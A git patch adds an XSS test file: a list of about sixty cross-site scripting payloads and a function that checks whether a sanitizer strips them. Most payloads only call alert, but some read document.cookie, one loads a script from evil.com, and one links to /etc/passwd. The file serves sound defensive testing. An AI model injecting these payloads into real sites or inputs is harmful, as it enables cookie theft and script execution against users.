From 32a285bede829db376329ab7ff45aa844892da31 Mon Sep 17 00:00:00 2001
From: retoor <retoor@molodetz.nl>
Date: Thu, 24 Jul 2025 01:53:22 +0200
Subject: [PATCH] Tests to remember.

---
 xsstest.js | 147 +++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 147 insertions(+)
 create mode 100644 xsstest.js

diff --git a/xsstest.js b/xsstest.js
new file mode 100644
index 0000000..90b680f
--- /dev/null
+++ b/xsstest.js
@@ -0,0 +1,147 @@
+const xssTestVectors = [
+  // Basic Script Injection
+  `<script>alert('XSS')</script>`,
+  `<script>alert(String.fromCharCode(88,83,83))</script>`,
+  `<script>alert(document.cookie)</script>`,
+  
+  // IMG Tag Attacks
+  `<img src=x onerror=alert('XSS')>`,
+  `<img src=x onerror=alert(String.fromCharCode(88,83,83))>`,
+  `<img src=x onerror=alert(document.cookie)>`,
+  `<img src="javascript:alert('XSS')">`,
+  
+  // SVG Attacks
+  `<svg onload=alert('XSS')>`,
+  `<svg/onload=alert('XSS')>`,
+  `<svg><script>alert('XSS')</script></svg>`,
+  
+  // Event Handler Attacks
+  `<body onload=alert('XSS')>`,
+  `<div onclick="alert('XSS')">Click me</div>`,
+  `<input type="text" onfocus="alert('XSS')" autofocus>`,
+  `<select onfocus="alert('XSS')" autofocus><option>test</option></select>`,
+  `<textarea onfocus="alert('XSS')" autofocus>test</textarea>`,
+  `<button onclick="alert('XSS')">Click</button>`,
+  
+  // Link/Anchor Attacks
+  `<a href="javascript:alert('XSS')">Click</a>`,
+  `<a href="jAvAsCrIpT:alert('XSS')">Click</a>`,
+  `<a href="  javascript:alert('XSS')">Click</a>`,
+  `<a href="java\nscript:alert('XSS')">Click</a>`,
+  
+  // Style Attribute Attacks
+  `<div style="background-image: url('javascript:alert(1)')">`,
+  `<div style="expression(alert('XSS'))">`,
+  `<style>body{background:url("javascript:alert('XSS')")}</style>`,
+  
+  // Meta Tag Attacks
+  `<meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">`,
+  `<meta http-equiv="refresh" content="0;url=data:text/html,<script>alert('XSS')</script>">`,
+  
+  // Form Attacks
+  `<form action="javascript:alert('XSS')"><input type="submit"></form>`,
+  `<form><button formaction="javascript:alert('XSS')">Submit</button></form>`,
+  
+  // Iframe Attacks
+  `<iframe src="javascript:alert('XSS')"></iframe>`,
+  `<iframe src="data:text/html,<script>alert('XSS')</script>"></iframe>`,
+  
+  // Object/Embed Attacks
+  `<object data="javascript:alert('XSS')"></object>`,
+  `<embed src="javascript:alert('XSS')">`,
+  
+  // Encoded Attacks
+  `<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;">`,
+  `<img src=x onerror="&#x61;&#x6C;&#x65;&#x72;&#x74;('XSS')">`,
+  `<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert('XSS')">Click</a>`,
+  
+  // Data URI Attacks
+  `<a href="data:text/html,<script>alert('XSS')</script>">Click</a>`,
+  `<script src="data:text/javascript,alert('XSS')"></script>`,
+  
+  // Base64 Encoded
+  `<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">`,
+  
+  // Protocol Handlers
+  `<a href="vbscript:msgbox('XSS')">Click</a>`,
+  `<a href="file:///etc/passwd">Click</a>`,
+  
+  // Comments and CDATA
+  `<!--[if IE]><script>alert('XSS')</script><![endif]-->`,
+  `<![CDATA[<script>alert('XSS')</script>]]>`,
+  
+  // Malformed Tags
+  `<script/src="http://evil.com/xss.js"></script>`,
+  `<sc<script>ript>alert('XSS')</sc</script>ript>`,
+  `<<script>alert('XSS');//<</script>`,
+  
+  // Case Variations
+  `<ScRiPt>alert('XSS')</ScRiPt>`,
+  `<IMG SRC=javascript:alert('XSS')>`,
+  `<iMg SrC=x OnErRoR=alert('XSS')>`,
+  
+  // Null Bytes and Special Characters
+  `<script>alert('XSS')</script>`,
+  `<scr\x00ipt>alert('XSS')</scr\x00ipt>`,
+  
+  // Multiple Vectors in One
+  `<div><script>alert('XSS1')</script><img src=x onerror=alert('XSS2')><a href="javascript:alert('XSS3')">Click</a></div>`,
+  
+  // CSS Expression (IE specific)
+  `<div style="width: expression(alert('XSS'));">`,
+  
+  // HTML5 Specific
+  `<video onerror="alert('XSS')"><source></video>`,
+  `<audio onerror="alert('XSS')"><source></audio>`,
+  `<details open ontoggle="alert('XSS')">`,
+  
+  // Mutation XSS
+  `<noscript><p title="</noscript><img src=x onerror=alert('XSS')>">`,
+  
+  // DOM Clobbering
+  `<form name="getElementById"><img src=x name="ownerDocument" onerror="alert('XSS')"></form>`,
+];
+
+// Function to test sanitization
+function testSanitization(sanitizeFunction) {
+  console.log('Testing XSS Prevention...\n');
+  
+  let passed = 0;
+  let failed = 0;
+  
+  xssTestVectors.forEach((vector, index) => {
+    const sanitized = sanitizeFunction(vector);
+    
+    // Check if common XSS indicators are present in sanitized output
+    const hasScript = /<script/i.test(sanitized);
+    const hasJavascript = /javascript:/i.test(sanitized);
+    const hasOnEvent = /on\w+\s*=/i.test(sanitized);
+    const hasVBScript = /vbscript:/i.test(sanitized);
+    const hasData = /data:text\/html/i.test(sanitized);
+    
+    const isVulnerable = hasScript || hasJavascript || hasOnEvent || hasVBScript || hasData;
+    
+    if (isVulnerable) {
+      console.log(`❌ FAILED Test ${index + 1}: Potential XSS vulnerability detected`);
+      console.log(`   Input: ${vector.substring(0, 50)}...`);
+      console.log(`   Output: ${sanitized.substring(0, 50)}...`);
+      failed++;
+    } else {
+      console.log(`✅ PASSED Test ${index + 1}`);
+      passed++;
+    }
+  });
+  
+  console.log(`\n========== TEST RESULTS ==========`);
+  console.log(`Total Tests: ${xssTestVectors.length}`);
+  console.log(`Passed: ${passed}`);
+  console.log(`Failed: ${failed}`);
+  console.log(`Success Rate: ${((passed/xssTestVectors.length) * 100).toFixed(2)}%`);
+}
+
+// Export for use
+if (typeof module !== 'undefined' && module.exports) {
+  module.exports = { xssTestVectors, testSanitization };
+}
+
+